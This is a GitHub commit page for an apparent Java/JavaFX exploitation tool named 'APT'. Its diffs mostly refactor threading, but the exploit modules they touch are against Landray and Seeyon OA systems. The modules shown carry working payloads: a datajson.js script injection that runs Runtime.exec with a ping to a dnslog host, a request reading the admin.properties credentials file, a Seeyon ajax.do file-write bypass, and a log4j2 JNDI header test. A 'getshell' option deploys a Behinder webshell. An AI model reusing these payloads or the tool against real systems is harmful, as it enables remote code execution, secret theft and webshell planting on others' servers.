Skip to content

Commit

Permalink
Merge pull request #6 from White-hua/bingfa
Browse files Browse the repository at this point in the history 
Bingfa
  • Loading branch information
@White-hua
White-hua authored Oct 15, 2022
2 parents 7457385 + c5a07cc commit 484bfa3
Show file tree
Hide file tree
Showing 30 changed files with 356 additions and 131 deletions.
3 changes: 2 additions & 1 deletion src/main/java/Main.java
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
import cn.hutool.core.io.resource.ResourceUtil;
import java.util.Objects;
import javafx.application.Application;
import javafx.fxml.FXMLLoader;
import javafx.scene.Parent;
Expand All @@ -12,7 +13,7 @@ public void start(Stage primaryStage) throws Exception{
Parent root = FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
primaryStage.setTitle("APT");
Scene scene = new Scene(root,1280,910);
// scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
primaryStage.setScene(scene);
primaryStage.show();
}
Expand Down
121 changes: 87 additions & 34 deletions src/main/java/controller/AttController.java
View file
Original file line number Diff line number Diff line change
@@ -1,12 +1,16 @@
package controller;

import cn.hutool.core.date.DateUtil;
import cn.hutool.core.util.StrUtil;
import core.Exploitlnterface;
import java.util.HashMap;
import java.util.Objects;
import java.util.concurrent.CompletionService;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.stream.IntStream;
import javafx.application.Platform;
import javafx.collections.ObservableList;
import javafx.fxml.FXML;
import javafx.scene.control.Button;
Expand All @@ -24,6 +28,8 @@ public class AttController {
private final Kinds_Exp exp = new Kinds_Exp();//初始化EXP相关数据

private final ExecutorService service = Executors.newCachedThreadPool();
private final CompletionService<HashMap<String, Object>> completionService = new ExecutorCompletionService<>(
service);
private boolean initialized = false;//是否初始化

@FXML
Expand All @@ -33,13 +39,13 @@ public class AttController {
private Button Button_Att;

@FXML
private TextArea textArea_attInfo;
private TextArea textArea_attInfo; //ATT 结果文本域

@FXML
private TextField textField_url;

@FXML
private TextArea textArea_info;
private TextArea textArea_info; //中间说明文本域

@FXML
private ChoiceBox<String> choiceBox_exp;
Expand Down Expand Up @@ -151,58 +157,105 @@ void clicked_dnslog_token(MouseEvent event) {
@FXML
void Att_clicked(MouseEvent event) { //ATT按钮
//初始清空
textArea_attInfo.setText("");
Platform.runLater(() -> {
textArea_attInfo.clear();
});
//获取url地址
String url;
String trimText = textField_url.getText().trim();
if (trimText.endsWith("/")) {
url = trimText.substring(0, trimText.length() - 1);
if (StrUtil.isBlank(textField_url.getText())) {
Platform.runLater(() -> {
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText("请填写URL:");
});
return;
}
if (textField_url.getText().trim().endsWith("/")) {
url = textField_url.getText().trim()
.substring(0, textField_url.getText().trim().length() - 1);
} else {
url = trimText;
url = textField_url.getText().trim();
}

//获取需要利用的exp
String vulName = choiceBox_exp.getValue();
String vulname = choiceBox_exp.getValue();
//获取get shell按钮是否被选中
boolean getShell = radioButton_getshell.selectedProperty().get();
Boolean getshell = radioButton_getshell.selectedProperty().get();

//如果是all
if (vulName != null && vulName.equals("All")) {
textArea_attInfo.setText("");
if (vulname != null && vulname.equals("All")) {
ObservableList<String> items = choiceBox_exp.getItems();
int count = items.size() - 1;
if (count<=0) return;
CountDownLatch countDownLatch = new CountDownLatch(count);
// System.out.println("共:"+count+"个");
IntStream.range(1, items.size()).mapToObj(items::get).filter(Objects::nonNull).forEach(val -> {
try {
service.submit(() -> Kinds_Exp.getExploit(val).checkVul(url, textArea_attInfo));
} catch (Exception e) {
e.printStackTrace();
} finally {
countDownLatch.countDown();
}
});
CountDownLatch countDownLatch = new CountDownLatch(items.size() - 1);

long start = System.currentTimeMillis();
for (int i = 1; i < items.size(); i++) {
String val = items.get(i);
service.submit(() -> {
try {
String x = "线程:" + Thread.currentThread().getName() + "开始";
System.out.println(x);
Exploitlnterface exploit = Kinds_Exp.getExploit(val);
if (exploit == null) {
Platform.runLater(() -> {
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText("未找到EXP:" + val);
});
throw new RuntimeException("未找到EXP");
}
if (Objects.isNull(textArea_attInfo)) {
System.out.println("NPE debugger");
}
exploit.checkVul(url, textArea_attInfo);
} catch (Exception e) {
if (e instanceof IndexOutOfBoundsException) {
System.out.println("数组下标越界异常");
}
if (e instanceof NullPointerException) {
System.out.println("NPE异常");
}
e.printStackTrace();
} finally {
String threadName = "线程:" + Thread.currentThread().getName();
// String x = threadName + "结束";
System.out.println(threadName+" spend:" + (System.currentTimeMillis() - start) + "ms");
// Platform.runLater(() -> {
// textArea_attInfo.appendText("\n");
// textArea_attInfo.appendText(x);
// textArea_attInfo.appendText("\n");
// });
countDownLatch.countDown();
}
});
}

try {
countDownLatch.await();
} catch (InterruptedException e) {
System.out.println("total spend:" + (System.currentTimeMillis() - start) + "ms");
Platform.runLater(() -> {
textArea_attInfo.appendText(
"\n\n如需获取shell请勾选 getshell并选择具体漏洞" + " " + DateUtil.now());
});
} catch (Exception e) {
e.printStackTrace();
}
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText(
"如需获取shell请勾选 getshell并选择具体漏洞" + " " + DateUtil.now());

} else if (vulName != null) {

} else if (vulname != null) {

//生成exp对应类对象
Exploitlnterface exploit = Kinds_Exp.getExploit(vulName);
Exploitlnterface exploit = Kinds_Exp.getExploit(vulname);
//检查是否存在漏洞
Boolean checkVul = exploit.checkVul(url, textArea_attInfo);
if (checkVul) {
if (!getShell) {
if (!getshell) {
textArea_attInfo.appendText("\n可以进行GetShell, 请选中getshell 单击ATT");
}
if (getShell&&exploit.getshell(url, textArea_attInfo)) {
if (getshell) {
Boolean shell_success = exploit.getshell(url, textArea_attInfo);
if (shell_success) {
textArea_attInfo.appendText("\n--Getshell 成功 若无特别说明则默认使用冰蝎4.0.3 aes--");
}


}
}

Expand Down
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/landrayoa/landray_datajson.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -25,10 +26,14 @@ private Boolean att(String url,TextArea textArea){
String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog+"%22)&type=1";
Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");
if(response.getCode() == 200 && response.getText().contains("success")){
textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
Platform.runLater(()->{
textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
});
return true;
}else {
textArea.appendText("\n landray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n landray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}

Expand Down
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/landrayoa/landray_sysSearchMain.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -28,10 +29,14 @@ private Boolean att(String url,TextArea textArea){
String poststr = "var={\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}";
Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", poststr, head, "utf-8");
if(post.getCode() == 200 && post.getText().contains("kmss.properties")) {
textArea.appendText(post.getText().replace("\n","").replace("kmss.properties.encrypt.enabled = true",""));
Platform.runLater(()->{
textArea.appendText(post.getText().replace("\n","").replace("kmss.properties.encrypt.enabled = true",""));
});
return true;
}else {
textArea.appendText("\n landray_sysSearchMain.do-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n landray_sysSearchMain.do-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
Expand Down
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/landrayoa/landray_treexmlTmpl.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -26,10 +27,14 @@ private Boolean att(String url, TextArea textArea){

Response post1 = HttpTools.post(url + "/data/sys-common/treexml.tmpl", post, head, "utf-8");
if(post1.getCode() == 200 && post1.getText().contains("Landray.log")){
textArea.appendText("\n treexmlTmpl漏洞存在 请设置代理抓包 直接执行系统命令");
Platform.runLater(()->{
textArea.appendText("\n treexmlTmpl漏洞存在 请设置代理抓包 直接执行系统命令");
});
return true;
}else {
textArea.appendText("\n landray_treexmlTmpl-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n landray_treexmlTmpl-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
Expand Down
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/seeyonoa/seeyonoa_ajaxBypass.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -23,10 +24,14 @@ private Boolean att(String url,TextArea textArea){
HttpTools.get(url + "/seeyon/ajax.do;Jsessionid=getAjaxDataServlet?method=ajaxAction&managerMethod=validate&managerName=formulaManager&requestCompress=gzip&S=ajaxColManager&M=colDelLock&arguments=" + payload, new HashMap<String, String>(), "utf-8");
Response response1 = HttpTools.get(url + "/seeyon/nishizhu.txt", new HashMap<String, String>(), "utf-8");
if(response1.getCode() == 200 && response1.getText().contains(shell.test_payload)){
textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/seeyon/nishizhu.txt");
Platform.runLater(()->{
textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/seeyon/nishizhu.txt");
});
return true;
}else {
textArea.appendText("\n seeyonoa_ajaxBypass-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_ajaxBypass-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
Expand Down
13 changes: 10 additions & 3 deletions src/main/java/exp/oa/seeyonoa/seeyonoa_htmlofficeservlet.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand Down Expand Up @@ -36,14 +37,20 @@ private Boolean att(String url,TextArea textArea){
if(post.getCode() == 200 && post.getText().contains(shell.test_payload)){
Response response = HttpTools.get(url + "/seeyon/nishizhu.txt", new HashMap<String, String>(), "utf-8");
if(response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyon/nishizhu.txt");
Platform.runLater(()->{
textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyon/nishizhu.txt");
});
return true;
}else {
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}else {
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
Expand Down
31 changes: 27 additions & 4 deletions src/main/java/exp/oa/seeyonoa/seeyonoa_main_log4j2.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,9 @@

import core.Exploitlnterface;
import java.util.HashMap;
import java.util.Objects;
import java.util.concurrent.TimeUnit;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -28,20 +31,40 @@ private Boolean att(String url,TextArea textArea){
head.put("X-Api-Version", log4jpayload);

Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
try {
TimeUnit.SECONDS.sleep(3);
} catch (InterruptedException e) {
e.printStackTrace();
}
if (Objects.isNull(dns_le1)|| Objects.isNull(dns_le1.getText())){
// throw new RuntimeException("当前那EXP返回 null");
Platform.runLater(()->{
textArea.appendText("\n");
textArea.appendText("seeyonoa_main_log4j2-RCE 当前那EXP返回 null");
});
return false;
}
int dns_1 = dns_le1.getText().length();

Response response = HttpTools.get(url + "/seeyon/main.do", head, "utf-8");
try { Thread.sleep (5000) ;
} catch (Exception ie){}
try {
TimeUnit.SECONDS.sleep(5);
} catch (InterruptedException e) {
e.printStackTrace();
}

Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
int dns_2 = dns_le2.getText().length();

if(dns_2 > dns_1 && response.getCode() == 200){
textArea.appendText("\n log4j2漏洞存在-收到dnslog回显,请使用VPS自行利用");
Platform.runLater(()->{
textArea.appendText("\n log4j2漏洞存在-收到dnslog回显,请使用VPS自行利用");
});
return true;
}else {
textArea.appendText("\n seeyonoa_main_log4j2-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_main_log4j2-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}

Expand Down
Loading

0 comments on commit 484bfa3

Please sign in to comment.